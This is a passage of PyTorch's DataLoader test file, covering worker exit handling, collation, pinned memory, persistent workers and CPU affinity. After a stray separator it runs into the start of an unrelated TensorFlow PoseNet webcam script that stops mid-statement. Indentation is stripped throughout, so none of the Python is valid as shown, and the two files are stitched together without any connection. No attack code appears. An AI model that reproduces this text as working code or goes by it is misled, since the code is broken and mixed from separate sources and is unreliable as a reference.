# iterator. This is interesting because Python 3 error traces hold a
# reference to the frames, which hold references to all the local
# variables, including the iterator; the iterator dtor may then not
# be called before the process ends. It is important to see that the
# processes still exit in both cases.
if pin_memory and (not TEST_CUDA or NO_MULTIPROCESSING_SPAWN or IS_WINDOWS):
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# DataLoader with pin_memory=True initializes CUDA when its iterator is constructed.
# For windows, pin_memory sometimes causes CUDA oom.
continue
# `exit_method` controls the way the loader process ends.
# - `*_kill` means that `*` is killed by OS.
# - `*_error` means that `*` raises an error.
# - `None` means that no error happens.
# In all cases, all processes should end properly.
if use_workers:
exit_methods = [None, 'loader_error', 'loader_kill', 'worker_error', 'worker_kill']
persistent_workers = self.persistent_workers
else:
exit_methods = [None, 'loader_error', 'loader_kill']
persistent_workers = False
for exit_method in exit_methods:
if exit_method == 'worker_kill':
# FIXME: This sometimes hangs. See #16608.
continue
desc = []
desc.append('is_iterable_dataset={}'.format(is_iterable_dataset))
desc.append('use_workers={}'.format(use_workers))
desc.append('pin_memory={}'.format(pin_memory))
desc.append('hold_iter_reference={}'.format(hold_iter_reference))
desc.append('exit_method={}'.format(exit_method))
desc = 'test_proper_exit with ' + ', '.join(desc)
# Event that the loader process uses to signal the testing process
# that everything is set up, including that the worker PIDs are
# recorded in the `worker_pids` array.
loader_setup_event = mp.Event()
# Event signaling that this process has finished setting up and that
# the loader process can now proceed to trigger error events or
# finish normally.
tester_setup_event = mp.Event()
loader_p = ErrorTrackingProcess(target=_test_proper_exit,
args=(is_iterable_dataset, use_workers, pin_memory,
exit_method, hold_iter_reference,
loader_setup_event, tester_setup_event,
persistent_workers),
disable_stderr=False)
loader_p.start()
loader_psutil_p = psutil.Process(loader_p.pid)
# Wait for loader process to set everything up, e.g., starting
# workers.
loader_setup_event.wait(timeout=JOIN_TIMEOUT)
if not loader_setup_event.is_set():
fail_msg = desc + ': loader process failed to set up within the given time'
if loader_p.exception is not None:
fail_msg += ', and had exception {}'.format(loader_p.exception)
elif not loader_p.is_alive():
fail_msg += ', and exited with code {} but had no exception'.format(loader_p.exitcode)
else:
fail_msg += ', and is still alive.'
if loader_p.is_alive():
# this may kill the process, needs to run after the above lines
loader_p.print_traces_of_all_threads()
self.fail(fail_msg)
# We are certain that the workers have started now.
worker_psutil_ps = loader_psutil_p.children()
def fail(reason):
report_psutil_attrs = ['pid', 'name', 'cpu_times', 'io_counters',
'memory_full_info', 'num_ctx_switches',
'open_files', 'threads', 'status',
'nice', 'ionice']
if reason is None:
err_msg = desc
else:
err_msg = '{}: {}'.format(desc, reason)
err_msg += '\nLoader info:\n\t'
if loader_psutil_p.is_running():
err_msg += str(loader_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
loader_p.print_traces_of_all_threads()
else:
err_msg += 'exited with code {}'.format(loader_p.exitcode)
if use_workers:
err_msg += '\nWorker(s) info:'
for idx, worker_psutil_p in enumerate(worker_psutil_ps):
err_msg += '\n\tWorker {}:\n\t\t'.format(idx)
if worker_psutil_p.is_running():
err_msg += str(worker_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
print_traces_of_all_threads(worker_psutil_p.pid)
else:
err_msg += 'exited with unknown code'
self.fail(err_msg)
tester_setup_event.set()
try:
loader_p.join(JOIN_TIMEOUT + MP_STATUS_CHECK_INTERVAL)
if loader_p.is_alive():
fail_reason = 'loader process did not terminate'
if loader_p.exception is not None:
fail(fail_reason + ', and had exception {}'.format(loader_p.exception))
else:
fail(fail_reason + ', and had no exception')
_, alive = psutil.wait_procs(worker_psutil_ps, timeout=(MP_STATUS_CHECK_INTERVAL + JOIN_TIMEOUT))
if len(alive) > 0:
fail('worker process (pid(s) {}) did not terminate'.format(
', '.join(str(p.pid) for p in alive)))
if exit_method is None:
if loader_p.exitcode != 0:
fail('loader process had nonzero exitcode {}'.format(loader_p.exitcode))
else:
if loader_p.exitcode == 0:
fail('loader process had zero exitcode')
if exit_method == 'loader_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Loader error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_kill':
if isinstance(loader_p.exception, RuntimeError):
if 'DataLoader worker (pid' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif isinstance(loader_p.exception, ConnectionRefusedError):
# Sometimes, when the worker is being killed and is freeing its
# resources, the unpickling in the loader process may hit a
# `ConnectionRefusedError` because it cannot open a socket to receive
# the resource. In such cases, the worker may not have fully exited,
# and the loader can't detect this via an `is_alive` check or the
# `SIGCHLD` handler. So we permit this as an allowed error as well.
# After all, we are happy as long as it terminates.
pass
else:
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Worker error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
finally:
loader_p.terminate()
def test_len(self):
def check_len(dl, expected):
self.assertEqual(len(dl), expected)
n = 0
for _ in dl:
n += 1
self.assertEqual(n, expected)
check_len(self.dataset, 100)
check_len(self._get_data_loader(self.dataset, batch_size=2), 50)
check_len(self._get_data_loader(self.dataset, batch_size=3), 34)
def test_iterabledataset_len(self):
class IterableDataset(torch.utils.data.IterableDataset):
def __len__(self):
return 10
def __iter__(self):
return iter(range(10))
iterable_loader = DataLoader(IterableDataset(), batch_size=1)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=1, drop_last=True)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=2)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=2, drop_last=True)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=3)
self.assertEqual(len(iterable_loader), 4)
iterable_loader = DataLoader(IterableDataset(), batch_size=3, drop_last=True)
self.assertEqual(len(iterable_loader), 3)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_scalars(self):
import numpy as np
class ScalarDataset(torch.utils.data.Dataset):
def __init__(self, dtype):
self.dtype = dtype
def __getitem__(self, i):
return self.dtype()
def __len__(self):
return 4
dtypes = {
np.float64: torch.DoubleTensor,
np.float32: torch.FloatTensor,
np.float16: torch.HalfTensor,
np.int64: torch.LongTensor,
np.int32: torch.IntTensor,
np.int16: torch.ShortTensor,
np.int8: torch.CharTensor,
np.uint8: torch.ByteTensor,
}
for dt, tt in dtypes.items():
dset = ScalarDataset(dt)
loader = self._get_data_loader(dset, batch_size=2)
batch = next(iter(loader))
self.assertIsInstance(batch, tt)
def test_default_convert_mapping_keep_type(self):
data = CustomDict({"a": 1, "b": 2})
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, data)
def test_default_convert_sequence_keep_type(self):
data = CustomList([1, 2, 3])
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, data)
def test_default_convert_sequence_dont_keep_type(self):
data = range(2)
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, [0, 1])
def test_default_collate_dtype(self):
arr = [1, 2, -1]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.int64)
arr = [1.1, 2.3, -0.9]
collated = _utils.collate.default_collate(arr)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.float64)
arr = [True, False]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.bool)
# Should be a no-op
arr = ['a', 'b', 'c']
self.assertEqual(arr, _utils.collate.default_collate(arr))
def test_default_collate_mapping_keep_type(self):
batch = [CustomDict({"a": 1, "b": 2}), CustomDict({"a": 3, "b": 4})]
collated = _utils.collate.default_collate(batch)
expected = CustomDict({"a": torch.tensor([1, 3]), "b": torch.tensor([2, 4])})
self.assertEqual(collated, expected)
def test_default_collate_sequence_keep_type(self):
batch = [CustomList([1, 2, 3]), CustomList([4, 5, 6])]
collated = _utils.collate.default_collate(batch)
expected = CustomList([
torch.tensor([1, 4]),
torch.tensor([2, 5]),
torch.tensor([3, 6]),
])
self.assertEqual(collated, expected)
def test_default_collate_sequence_dont_keep_type(self):
batch = [range(2), range(2)]
collated = _utils.collate.default_collate(batch)
self.assertEqual(collated, [torch.tensor([0, 0]), torch.tensor([1, 1])])
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_bad_numpy_types(self):
import numpy as np
# Should be a no-op
arr = np.array(['a', 'b', 'c'])
self.assertEqual(arr, _utils.collate.default_collate(arr))
arr = np.array([[['a', 'b', 'c']]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([object(), object(), object()])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([[[object(), object(), object()]]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_numpy_memmap(self):
import numpy as np
with tempfile.TemporaryFile() as f:
arr = np.array([[0, 1], [2, 3], [4, 5], [6, 7]])
arr_memmap = np.memmap(f, dtype=arr.dtype, mode='w+', shape=arr.shape)
arr_memmap[:] = arr[:]
arr_new = np.memmap(f, dtype=arr.dtype, mode='r', shape=arr.shape)
tensor = _utils.collate.default_collate(list(arr_new))
self.assertTrue((tensor == tensor.new_tensor([[0, 1], [2, 3], [4, 5], [6, 7]])).all().item())
def test_default_collate_bad_sequence_type(self):
batch = [['X'], ['X', 'X']]
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch))
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch[::-1]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_shared_tensor(self):
import numpy as np
t_in = torch.zeros(1)
n_in = np.zeros(1)
self.assertEqual(t_in.is_shared(), False)
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), False)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), False)
# FIXME: fix the following hack that makes `default_collate` believe
# that it is in a worker process (since it tests
# `get_worker_info() != None`), even though it is not.
old = _utils.worker._worker_info
try:
_utils.worker._worker_info = 'x'
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), True)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), True)
finally:
_utils.worker._worker_info = old
def test_excessive_thread_creation_warning(self):
with self.assertWarnsRegex(
UserWarning,
r"excessive worker creation might get DataLoader running slow or even freeze"):
dataloader = DataLoader(self.dataset, batch_size=2, num_workers=1000)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2(TestCase):
@skipIfNoDill
def test_basics(self):
# TODO(VitalyFedyunin): This test will start breaking if we remove guaranteed order
# of traversing workers
dp = IterableWrapper(list(range(1000)))
dl = DataLoader(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
dl2 = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
dl2_threading = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2, parallelism_mode='thread')
self.assertEqual(list(dl), list(dl2))
self.assertEqual(list(dl), list(dl2_threading))
class Sorter(IterDataPipe):
def __init__(self, datapipe):
self.datapipe = datapipe
def __iter__(self):
return iter(sorted(self.datapipe))
def test_shuffle(self):
items = list(range(1000))
dp = IterableWrapper(items).sharding_filter().shuffle()
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=False)
self.assertEqual(items, list(dl))
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=False,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
self.assertEqual(items, list(dl))
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=True)
self.assertNotEqual(items, list(dl))
self.assertEqual(items, sorted(list(dl)))
dl = DataLoader2(dp, batch_size=None, num_workers=2, shuffle=True,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
self.assertNotEqual(items, list(dl))
self.assertEqual(items, sorted(list(dl)))
dl = DataLoader2(self.Sorter(dp), batch_size=None, num_workers=2, shuffle=True)
self.assertEqual(list(dl), items)
dl = DataLoader2(self.Sorter(dp), batch_size=None, num_workers=2, shuffle=True,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
self.assertEqual(list(dl), items)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2_EventLoop(TestCase):
@skipIfNoDill
def test_basic_threading(self):
def clean_me(process, req_queue, res_queue):
req_queue.put(communication.messages.TerminateRequest())
_ = res_queue.get()
process.join()
it = list(range(100))
numbers_dp = IterableWrapper(it)
(process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(numbers_dp)
process.start()
local_datapipe = communication.iter.QueueWrapper(
communication.protocol.IterDataPipeQueueProtocolClient(req_queue, res_queue))
actual = list(local_datapipe)
clean_me(process, req_queue, res_queue)
self.assertEqual(list(range(100)), actual)
@skipIfNoDill
def test_basic_mapdatapipe_threading(self):
def clean_me(process, req_queue, res_queue):
req_queue.put(communication.messages.TerminateRequest())
_ = res_queue.get()
process.join()
input_len = 100
it = list(range(input_len))
numbers_dp = SequenceWrapper(it)
(process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(
numbers_dp)
process.start()
# Functional Test: Ensure that you can retrieve every element from the Queue and DataPipe
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
actual = list(local_datapipe)
self.assertEqual([(x, x) for x in range(100)], actual)
# Functional Test: raise an IndexError when the requested index is out of bounds
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
with self.assertRaisesRegex(IndexError, "out of bound"):
local_datapipe[1000]
# __len__ Test: Ensure that the correct length is returned
local_datapipe = communication.map.QueueWrapperForMap(
communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
self.assertEqual(input_len, len(local_datapipe))
clean_me(process, req_queue, res_queue)
class StringDataset(Dataset):
def __init__(self):
self.s = '12345'
def __len__(self):
return len(self.s)
def __getitem__(self, ndx):
return (self.s[ndx], ndx)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestStringDataLoader(TestCase):
def setUp(self):
super(TestStringDataLoader, self).setUp()
self.dataset = StringDataset()
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for (s, n) in loader:
self.assertIsInstance(s[0], str)
self.assertTrue(n.is_pinned())
class DictDataset(Dataset):
def __len__(self):
return 4
def __getitem__(self, ndx):
return {
'a_tensor': torch.empty(4, 2).fill_(ndx),
'another_dict': {
'a_number': ndx,
},
}
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDictDataLoader(TestCase):
def setUp(self):
super(TestDictDataLoader, self).setUp()
self.dataset = DictDataset()
def test_sequential_batch(self):
for persistent_workers in (False, True):
if persistent_workers:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers, num_workers=1)
else:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers)
batch_size = loader.batch_size
for i, sample in enumerate(loader):
idx = i * batch_size
self.assertEqual(set(sample.keys()), {'a_tensor', 'another_dict'})
self.assertEqual(set(sample['another_dict'].keys()), {'a_number'})
t = sample['a_tensor']
self.assertEqual(t.size(), torch.Size([batch_size, 4, 2]))
self.assertTrue((t[0] == idx).all())
self.assertTrue((t[1] == idx + 1).all())
n = sample['another_dict']['a_number']
self.assertEqual(n.size(), torch.Size([batch_size]))
self.assertEqual(n[0], idx)
self.assertEqual(n[1], idx + 1)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for sample in loader:
self.assertTrue(sample['a_tensor'].is_pinned())
self.assertTrue(sample['another_dict']['a_number'].is_pinned())
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory_device(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True, pin_memory_device='cuda')
for sample in loader:
self.assertTrue(sample['a_tensor'].is_pinned(device='cuda'))
self.assertTrue(sample['another_dict']['a_number'].is_pinned(device='cuda'))
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory_with_only_device(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory_device='cuda')
for sample in loader:
self.assertFalse(sample['a_tensor'].is_pinned(device='cuda'))
self.assertFalse(sample['another_dict']['a_number'].is_pinned(device='cuda'))
class DummyDataset(torch.utils.data.Dataset):
def __init__(self):
self.data = list(range(10))
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
# Persistent workers keep the original dataset alive for the
# lifetime of the dataloader, so its attributes remain the same
# as when the workers were first spawned (at the first
# dataloader iteration).
assert self.start == 0
return self.data[idx]
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN, "DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoaderPersistentWorkers(TestDataLoader):
def setUp(self):
super(TestDataLoaderPersistentWorkers, self).setUp()
self.persistent_workers = True
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super().__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
num_workers=1, persistent_workers=True):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_dataset_not_reset(self):
dataset = DummyDataset()
pin_memory_configs = [False]
if TEST_CUDA:
pin_memory_configs.append(True)
for pin_memory in pin_memory_configs:
dataloader = self._get_data_loader(dataset, num_workers=2, pin_memory=pin_memory)
dataset.start = 0
for i in range(10):
for x in dataloader:
pass
# Changing the start value here doesn't have any effect on the dataset
# cached by the workers, since they are not recreated between epochs
# and can cache values safely.
dataset.start = i
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "Needs fork")
def test_early_exit(self):
import subprocess
proc = subprocess.check_output([sys.executable, '-c', """\
import torch
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super().__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
if __name__ == '__main__':
dl = DataLoader(
RandomDataset(64, (28, 28)),
batch_size=16,
num_workers=2,
pin_memory=True,
persistent_workers=True,
multiprocessing_context="fork",
)
for _ in dl:
break
"""])
class NamedTupleDataset(Dataset):
from collections import namedtuple
Batch = namedtuple('Batch', ['data', 'label', 'random_tensor'])
Data = namedtuple('Data', ['positive', 'negative'])
def __len__(self):
return 4
def __getitem__(self, ndx):
return self.Batch(data=self.Data(positive=ndx, negative=-ndx),
label=str(ndx), random_tensor=torch.randn(3))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestNamedTupleDataLoader(TestCase):
def setUp(self):
super(TestNamedTupleDataLoader, self).setUp()
self.dataset = NamedTupleDataset()
def test_dataloader_with_namedtuple(self):
# auto-collation
loader = DataLoader(self.dataset, batch_size=2, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertIsInstance(batch.data.positive, torch.Tensor)
self.assertEqual(batch.data.positive.is_pinned(), TEST_CUDA)
# no auto-collation
loader = DataLoader(self.dataset, batch_size=None, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertNotIsInstance(batch.data.positive, torch.Tensor)
class SimpleCustomBatch(object):
def __init__(self, data):
transposed_data = list(zip(*data))
self.inp = torch.stack(transposed_data[0], 0)
self.tgt = torch.stack(transposed_data[1], 0)
def pin_memory(self):
self.inp = self.inp.pin_memory()
self.tgt = self.tgt.pin_memory()
return self
def is_pinned(self):
return self.inp.is_pinned() and self.tgt.is_pinned()
# Workaround for https://github.com/pytorch/pytorch/issues/50661
# Classes from `__main__` cannot be correctly unpickled from a spawned module
# See https://docs.python.org/3/library/multiprocessing.html#multiprocessing-programming
self_module = __import__(os.path.splitext(os.path.basename(__file__))[0])
def collate_wrapper(batch):
return self_module.SimpleCustomBatch(batch)
def collate_into_packed_sequence(batch):
data = torch.stack([sample[0] for sample in batch], 1)
t, b = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, enforce_sorted=False)
def collate_into_packed_sequence_batch_first(batch):
data = torch.stack([sample[0] for sample in batch], 0)
b, t = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, batch_first=True, enforce_sorted=False)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestCustomPinFn(TestCase):
def setUp(self):
super(TestCustomPinFn, self).setUp()
inps = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
tgts = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
self.dataset = TensorDataset(inps, tgts)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin_worker(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True, num_workers=1)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
class TestWorkerQueueDataset(Dataset):
def __init__(self, data):
self.data = data
self.worker_id = None
def worker_init_fn(self, worker_id):
self.worker_id = worker_id
def __getitem__(self, item):
return self.worker_id, self.data[item]
def __len__(self):
return len(self.data)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"Flaky with ASAN, see https://github.com/pytorch/pytorch/issues/65727")
class TestIndividualWorkerQueue(TestCase):
def setUp(self):
super(TestIndividualWorkerQueue, self).setUp()
self.dataset = TestWorkerQueueDataset(list(range(128)))
def _run_ind_worker_queue_test(self, batch_size, num_workers):
loader = DataLoader(
self.dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers,
timeout=5, worker_init_fn=self.dataset.worker_init_fn
)
current_worker_idx = 0
for i, (worker_ids, sample) in enumerate(loader):
self.assertEqual(worker_ids.tolist(), [current_worker_idx] * batch_size)
self.assertEqual(sample.tolist(), list(range(i * batch_size, (i + 1) * batch_size)))
current_worker_idx += 1
if current_worker_idx == num_workers:
current_worker_idx = 0
def test_ind_worker_queue(self):
max_num_workers = None
if hasattr(os, 'sched_getaffinity'):
try:
max_num_workers = len(os.sched_getaffinity(0))
except Exception:
pass
if max_num_workers is None:
cpu_count = os.cpu_count()
if cpu_count is not None:
# Use half number of CPUs
max_num_workers = cpu_count // 2
if max_num_workers is None:
max_num_workers = 1
for batch_size in (8, 16, 32, 64):
for num_workers in range(0, min(6, max_num_workers)):
self._run_ind_worker_queue_test(batch_size=batch_size, num_workers=num_workers + 1)
class SetAffinityDataset(IterableDataset):
def __iter__(self):
torch.randperm(1)
after = os.sched_getaffinity(0)
return iter(after)
def worker_set_affinity(_):
os.sched_setaffinity(0, [multiprocessing.cpu_count() - 1])
@unittest.skipIf(
not hasattr(os, 'sched_setaffinity'),
"os.sched_setaffinity is not available")
class TestSetAffinity(TestCase):
def test_set_affinity_in_worker_init(self):
dataset = SetAffinityDataset()
dataloader = torch.utils.data.DataLoader(
dataset, num_workers=2, worker_init_fn=worker_set_affinity)
for sample in dataloader:
self.assertEqual(sample, [multiprocessing.cpu_count() - 1])
class ConvDataset(Dataset):
def __init__(self):
self.x = torch.ones(1, 1, 24000)
# Call convolution on parent process
self[0]
def __len__(self):
return 1
def __getitem__(self, index):
return torch.nn.functional.conv1d(self.x, torch.ones(1, 1, 2))
@unittest.skipIf(IS_WINDOWS, "Needs fork")
class TestConvAfterFork(TestCase):
# Tests crash reported in https://github.com/pytorch/pytorch/issues/53565
def test_conv_after_fork(self):
loader = DataLoader(ConvDataset(), num_workers=1)
for x in loader:
self.assertEqual(x.shape, (1, 1, 1, 23999))
if __name__ == '__main__':
run_tests()
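# A minimal standalone sketch (illustrative only, defined but never called
# by the suite) of the length relation the sampler tests above rely on:
# with drop_last=False a DataLoader over N samples with batch size B has
# ceil(N / B) batches, and N // B batches with drop_last=True.
def _expected_num_batches(num_samples, batch_size, drop_last=False):
    if drop_last:
        return num_samples // batch_size
    # integer ceil(N / B) without importing math
    return num_samples // batch_size + (num_samples % batch_size > 0)
# e.g. _expected_num_batches(100, 6) == 17 and
#      _expected_num_batches(100, 6, drop_last=True) == 16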
|
webcam_demo.py | import tensorflow as tf
import json
import math
import cv2
import time
import argparse
import concurrent.futures
import posenet
import keyboard
import sys
import numpy as np
from threading import Thread
from slugify import slugify
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=int, default=101)
parser.add_argument('--cam_id', type=int, default=0)
parser.add_argument('--cam_width', type=int, default=1280)
parser.add_argument('--cam_height', type=int, default=720)
parser.add_argument('--scale_factor', type=float, default=0.7125)
parser.add_argument('--file', type=str, default=None, help="Optionally use a video file instead of a live camera")
args = parser.parse_args()
def main():
# tf.config.threading.set_inter_op_parallelism_threads(0)
# tf.config.threading.set_intra_op_parallelism_threads(0)
# print(tf.config.threading.get_inter_op_parallelism_threads())
# print(tf.config.threading.get_intra_op_parallelism_threads())
with tf.compat.v1.Session() as sess:
model_cfg, model_outputs = posenet.load_model(args.model, sess)
output_stride = model_cfg['output_stride']
if args.file is not None:
cap = cv2.VideoCapture(args.file)
else:
cap = cv2.VideoCapture(args.cam_id)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, args.cam_width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, args.cam_height)
start = time.time()
frame_count = 0
recording = True
# ret,frame1 = cap.read()
# ret,frame2 = cap.read()
file_content = []
while True:
# diff = cv2.absdiff(frame1,frame2)
# gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
# blur = cv2.GaussianBlur(gray,(15,15),0)
# _, thresh = cv2.threshold(blur,20,255,cv2.THRESH_BINARY)
# dilated = cv2.dilate(thresh,None, iterations=3)
# contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# # if(len(contours)>0):
# # print("One:")
# # print(dir(contours[0]))
# # print("One it is.")
# for contour in contours:
# (x,y,w,h) = cv2.boundingRect(contour)
# if(cv2.contourArea(contour)>400):
# continue
# cv2.rectangle(frame1,(x,y),(x+w,y+h),(0,255,0),2)
# # cv2.drawContours(frame1,contours, -1,(0,255,0),2)
# cv2.imshow("feed",frame1)
# frame1 = frame2
# ret, frame2 = cap.read()
input_image, display_image, output_scale = posenet.read_cap(cap, scale_factor=args.scale_factor, output_stride=output_stride)
heatmaps_result, offsets_result, displacement_fwd_result, displacement_bwd_result = sess.run(
model_outputs,
